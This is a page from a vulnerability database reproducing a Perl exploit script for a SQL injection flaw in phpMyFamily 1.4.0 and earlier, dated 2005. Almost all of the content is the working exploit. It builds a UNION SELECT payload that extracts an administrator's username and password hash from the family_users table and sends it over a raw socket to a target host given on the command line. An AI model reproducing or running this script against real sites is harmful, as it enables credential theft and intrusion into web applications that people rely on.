Lucene search

K

phpMyFamily <= 1.4.0 SQL Injection Exploit

🗓️ 27 Mar 2005 00:00:00Reported by basher13Type 
zdt
 zdt
🔗 0day.today👁 93 Views

PHPMyFamily SQL injection exploit for versions up to 1.4.0, uses Perl for execution.

Show more
Code
==========================================
phpMyFamily <= 1.4.0 SQL Injection Exploit
==========================================




#!/usr/bin/perl -w
# phpMyFamily Exploit injection
# ==============================
$banner = "phpMyFamily Exploit injection \n\n==============================
\n\nINFGPG-Hacking&Security Research";
# 
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous

use IO::Socket;
if ($#ARGV<0){
print "\n$banner";
print "\n\n Usage: perl phpMyFamily.pl [host] [path] \n\n";
exit;}

$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)

$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0\r\n\r\n";
$muka=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80")
or die "$ARGV[0]Connection Failed !!\n\n";

$muka -> autoflush(1);
print $muka "$serius";   
print "[*]Sending exploit DONE \n\n";            
sleep(7);
close($muka);



#  0day.today [2018-03-19]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Mar 2005 00:00Current
7.1High risk
Vulners AI Score7.1
93
.json
Report